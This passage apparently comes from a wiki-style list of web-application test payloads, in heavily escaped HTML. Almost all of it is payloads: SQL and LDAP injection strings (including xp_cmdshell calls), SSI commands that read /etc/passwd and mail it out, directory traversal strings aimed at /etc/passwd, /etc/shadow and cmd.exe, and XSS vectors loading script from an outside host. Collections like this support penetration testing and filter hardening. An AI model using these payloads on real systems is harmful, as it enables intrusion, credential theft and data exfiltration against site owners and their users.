 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
